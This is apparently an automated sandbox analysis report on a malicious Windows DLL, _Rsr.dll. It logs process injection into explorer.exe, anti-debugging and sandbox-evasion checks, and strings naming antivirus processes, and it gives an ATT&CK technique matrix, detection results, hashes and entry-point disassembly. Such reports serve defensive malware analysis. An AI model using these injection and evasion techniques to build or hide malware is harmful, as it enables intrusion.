          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{2893C507-C8CD-408A-991C-4E708D1630B8}
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2893C507-C8CD-408A-991C-4E708D1630B8}
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1176
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Binary string: amstream.pdb source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5089D6 push ecx; ret 0_2_6D5089E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BAEB6 push cs; iretd 2_2_027BAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BCB95 push esi; iretd 2_2_027BCB9A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BB066 push ebx; ret 2_2_027BB067
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BADB4 push cs; iretd 2_2_027BAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5089D6 push ecx; ret 2_2_6D5089E9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D505A34 LoadLibraryA,GetProcAddress,0_2_6D505A34
          Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Desktop\_Rsr.dll (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: DF380 value: E9 B8 6E DF 02
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4892 base: DF380 value: E9 B8 6E EA 02
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: DF380 value: E9 B8 6E 61 02
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4700 base: DF380 value: E9 B8 6E D4 02
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1408 Thread sleep count: 113 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2360 Thread sleep count: 365 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 68 Thread sleep count: 288 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2068 Thread sleep count: 300 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6080 Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2312 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6120 Thread sleep time: -57000s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_2-24414
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 365
          Source: C:\Windows\System32\loaddll32.exe API coverage: 7.7 %
          Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027ADE65 GetSystemInfo, 2_2_027ADE65
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50D074 FindFirstFileExA, 0_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027AC134 FindFirstFileW,FindNextFileW, 2_2_027AC134
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D50D074 FindFirstFileExA, 2_2_6D50D074
          Source: C:\Windows\System32\loaddll32.exe API call chain: ExitProcess graph end node graph_0-8001
          Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node graph_2-18852
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D50880E
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D505A34 LoadLibraryA,GetProcAddress, 0_2_6D505A34
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D515750 GetProcessHeap,RtlAllocateHeap, 0_2_6D515750
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50391B mov eax, dword ptr fs:[00000030h] 0_2_6D50391B
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50A626 mov eax, dword ptr fs:[00000030h] 0_2_6D50A626
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D50391B mov eax, dword ptr fs:[00000030h] 2_2_6D50391B
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D50A626 mov eax, dword ptr fs:[00000030h] 2_2_6D50A626
          Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D50880E
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50BCDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D50BCDC
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D508BA6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6D508BA6
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6D50880E
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D50BCDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6D50BCDC
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6D508BA6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6D508BA6

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF380
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2E50000
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF380
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E50000 protect: page read and write
          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: 2EC0000 value: B8
          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: 2DFB2D8 value: 00
          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: 2DFC1E8 value: 00
          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: 2F00000 value: 9C
          Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5128 base: DF380 value: E9
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4892 base: 2FB0000 value: 9C
          Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4892 base: DF380 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: 26E0000 value: B8
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: 25702D8 value: 00
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: 25711E8 value: 00
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: 2720000 value: 9C
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5784 base: DF380 value: E9
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4700 base: 2E50000 value: 9C
          Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 4700 base: DF380 value: E9
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\System32\loaddll32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D5089EB cpuid 0_2_6D5089EB
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6D50872B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6D50872B
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_027AE040 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW, 2_2_027AE040
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
          Source: loaddll32.exe, 00000000.00000003.388520207.000000000286F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.375579660.00000000047FF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.375665810.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.375323678.00000000049AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information


          Remote Access Functionality

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Native API | 1 DLL Side-Loading | 411 Process Injection | 1 Masquerading | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Screen Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Input Capture | 14 Security Software Discovery | Remote Desktop Protocol | 1 Credential API Hooking | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Virtualization/Sandbox Evasion | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 411 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Archive Collected Data | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Regsvr32 | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 24 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          [Figure: Behavior Graph. ID: 701477; Sample: _Rsr.dll; Startdate: 12/09/2022; Architecture: WINDOWS; Score: 84]

          Source | Detection | Scanner | Label
          _Rsr.dll | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          0.2.loaddll32.exe.a20000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          18.2.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          22.0.explorer.exe.2ed0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          3.2.rundll32.exe.3100000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          19.2.explorer.exe.2e20000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          20.0.explorer.exe.26f0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          4.2.rundll32.exe.2eb0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          19.0.explorer.exe.2e20000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          2.2.regsvr32.exe.27a0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          20.2.explorer.exe.26f0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          18.0.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          22.2.explorer.exe.2ed0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          No contacted IP infos
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:701477
          Start date and time:2022-09-12 18:09:53 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 3s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:_Rsr.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:34
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal84.troj.evad.winDLL@26/5@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 60.7% (good quality ratio 57.7%)
          • Quality average: 78.6%
          • Quality standard deviation: 28.5%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 30
          • Number of non-executed functions: 60
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 300000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.82.228.9, 20.82.154.241
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, neus1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, ris.api.iris.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          No simulations
          No context
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):0.9048599824278574
          Encrypted:false
          SSDEEP:192:mQRvi90oXiHBUZMX4jed+6/u7skS274ItWc:mKiTX6BUZMX4jef/u7skX4ItWc
          MD5:BA140683905DC21D8228DFB5EAA00FCB
          SHA1:8D742356F74FF037EF57472C887838452EEC3F36
          SHA-256:35053AA03EE4BD77E96425CD92BA16795B3C6112B55DB74F1B50D7A2E6ECBCC0
          SHA-512:0321B33E88FEE79855D4F342688C45B10ADCCEC033F7FDD979C58CD5DC55A3DD2FDF0B8DCC842849BE7CD3BEBC7D2F2AE10E447D86B850ED87E3EAB44EA9B4BB
          Malicious:false
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Tue Sep 13 01:11:23 2022, 0x1205a4 type
          Category:dropped
          Size (bytes):43598
          Entropy (8bit):2.178603719938501
          Encrypted:false
          SSDEEP:192:MnQCBwBHVO5Skbq9t/SxnLB3WjCOeMa5x6e/7Ux6NGnih:ZPW5Lbq9BeMPa5xki
          MD5:CF87A5ADF6D2F24280FFF66D0983984C
          SHA1:90B3F04C1CBFD6BF73D2F19A2D49973E427C18FE
          SHA-256:CF44CE8577786FA78868678674EC74BA72186360EF384F9CC7CB5F7962644650
          SHA-512:DBAABE55E0605BC4E7F7F8C2B2D906AA94E96E0470E9932AF75607E792B2A723FCC56F1617C0A85DF0A45E00CF90DBE20F5C00E537A407F0FDCF48937D390F13
          Malicious:false
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
          Category:dropped
          Size (bytes):8250
          Entropy (8bit):3.693098122962451
          Encrypted:false
          SSDEEP:192:Rrl7r3GLNiEU616Y666LxgmfTbSUCpro89bQ7sfo0vQm:RrlsNi/616Yf6LxgmfTbSpQAfr
          MD5:8A4783D6E4341DA5FC5069EE5E66B975
          SHA1:DEE8A897083E614065F6EDC4B45353DB08DCE1F2
          SHA-256:2209B7923082592B96951D4092C7897AC3D45A3DE7B438B0428907A047B4FA68
          SHA-512:525ECCF2CE5281CA571551937454F5FFC8FB466996CC9F35F86CDF3C2CFA2C17EE84C828C06687764463BA651E4AB2002DA9C2D1599B16212F312557DA652000
          Malicious:false
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):4618
          Entropy (8bit):4.454296337798293
          Encrypted:false
          SSDEEP:48:cvIwSD8zsNJgtWI9wrwhWgc8sqYjJ98fm8M4JCdsrF++q8/HM4SrSBd:uITfnrXgrsqYoJeBDWBd
          MD5:5B06A9516BDD150AAFD95A9B01B05069
          SHA1:9E579BFECA05C87DB79FA8FA4C66A61A499D6110
          SHA-256:2A045FFADD01FBA604DE84152EBD5837DC3678A162B8B5FC6D93B3F9969AC5F4
          SHA-512:61B352A10963A8285B54E8E7042A70370E8D9F5ABE960BF2CAD2DD916B29EAFC99E85930B70999548098C6DF17B5ECC60525DAE452A32241701D18398068542E
          Malicious:false
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):4.579865793152575
          Encrypted:false
          SSDEEP:96:0yHlJtTt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:0StMkXIKPD
          MD5:243AC7C1B33AD3E2D7445193FED65FFB
          SHA1:DC32AC331EE34B49050CFC52A0F8958DEF261784
          SHA-256:CB8E0ABE33970700BF675C874981DD028BD6AE71E8AB12F5570A50CEA9FAA462
          SHA-512:95AD65CB7F57CA7B286E1775FE4940FBA2AB67432EC191482A6ABC2950ACE8E3CE510BCFAF34AD19CAC4DE39F09B17F2092725C0B8FE283F66756BFB7E0AE054
          Malicious:true
          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.266546172645788
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:_Rsr.dll
          File size:409575
          MD5:416a95274ef9248e08d88d5e2abe6971
          SHA1:03ac095d3a7bedad7b5c4aa1ea02c77be9fa86cb
          SHA256:fce49100872fb07dea83d417a95574304dcfdfc835034739af1a50a752b8594a
          SHA512:849efaca1e00e21fb1201265cf88243f6ab6f11b887bacf395ea115ba2a5d5da26fe6efe48ba6bf0534c45e5306ea844f166bab79bb4c4597a5870a36e5f481c
          SSDEEP:12288:Iszlp6XPvegFvr1rOl7OwLT7H5DOrC/Wg2t5rJgq:Iszlp0Pv/vr8xff1DOGb2t5iq
          TLSH:B594BF93E4489DBFD87906B825EE9F9B02C9FE10044CFC35F185264EDF1D322662A75A
          Icon Hash:74f0e4ecccdce0e4
          Entrypoint:0x100083d8
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE
          Time Stamp:0x631F47E7 [Mon Sep 12 14:53:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:a9d5a9467068a950aca10d226cf265df
          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007F803866B9B7h
          call 00007F803866BCFAh
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007F803866B873h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov ecx, dword ptr [eax+3Ch]
          add ecx, eax
          movzx eax, word ptr [ecx+14h]
          lea edx, dword ptr [ecx+18h]
          add edx, eax
          movzx eax, word ptr [ecx+06h]
          imul esi, eax, 28h
          add esi, edx
          cmp edx, esi
          je 00007F803866B9CBh
          mov ecx, dword ptr [ebp+0Ch]
          cmp ecx, dword ptr [edx+0Ch]
          jc 00007F803866B9BCh
          mov eax, dword ptr [edx+08h]
          add eax, dword ptr [edx+0Ch]
          cmp ecx, eax
          jc 00007F803866B9BEh
          add edx, 28h
          cmp edx, esi
          jne 00007F803866B99Ch
          xor eax, eax
          pop esi
          pop ebp
          ret
          mov eax, edx
          jmp 00007F803866B9ABh
          call 00007F803866C0FAh
          test eax, eax
          jne 00007F803866B9B5h
          xor al, al
          ret
          mov eax, dword ptr fs:[00000018h]
          push esi
          mov esi, 1005D5F0h
          mov edx, dword ptr [eax+04h]
          jmp 00007F803866B9B6h
          cmp edx, eax
          je 00007F803866B9C2h
          xor eax, eax
          mov ecx, edx
          lock cmpxchg dword ptr [esi], ecx
          test eax, eax
          jne 00007F803866B9A2h
          xor al, al
          pop esi
          ret
          mov al, 01h
          pop esi
          ret
          call 00007F803866C0C5h
          test eax, eax
          je 00007F803866B9B9h
          call 00007F803866BF1Eh
